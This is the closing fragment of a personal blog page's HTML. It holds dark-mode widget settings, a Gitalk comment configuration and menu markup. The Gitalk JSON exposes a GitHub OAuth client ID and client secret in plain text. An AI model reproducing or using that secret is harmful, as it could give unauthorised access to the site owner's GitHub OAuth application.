  buttonColorDark: '#100f2c',
  buttonColorLight: '#fff',
  saveInCookies: true,
  label: '🌓',
  autoMatchOsTheme: true
}
const darkmode = new Darkmode(options);
window.darkmode = darkmode;
darkmode.showWidget();
</script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.8.0/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"PoYu-Liao","repo":"blog","client_id":"4a2b5cf826ad2ca46fa9","client_secret":"7368bd321e2ab86d6385d71078ae01d9143d6757","admin_user":"PoYu-Liao","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":"zh-TW","labels":"Blog-Gitalk","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.8.0/gitalk.min.js","integrity":"sha256-MVK9MGD/XJaGyIghSVrONSnoXoGh3IFxLw0zfvzpxR4="},"path_md5":"3d44b31e9d55060b154a6cf0013659e0"}</script>
<script src="/blog/js/third-party/comments/gitalk.js"></script>
<div class="moon-menu">
  <div class="moon-menu-items">
    
    <div id="moon-menu-item-back2bottom" class="moon-menu-item">
      <i class='fas fa-chevron-down'></i>    </div>
    
    <div id="moon-menu-item-back2top" class="moon-menu-item">
      <i class='fas fa-chevron-up'></i>    </div>
    
  </div>
  <div class="moon-menu-button">
    <svg class="moon-menu-bg">
      <circle class="moon-menu-cricle" cx="50%" cy="50%" r="44%"></circle>
      <circle class="moon-menu-border" cx="50%" cy="50%" r="48%"></circle>
    </svg>
    <div class="moon-menu-content">
      <div class="moon-menu-icon"><i class='fas fa-ellipsis-v'></i></div>
      <div class="moon-menu-text"></div>
    </div>
  </div>
</div><script src="/blog/js/injector.js"></script>
</body>
</html>
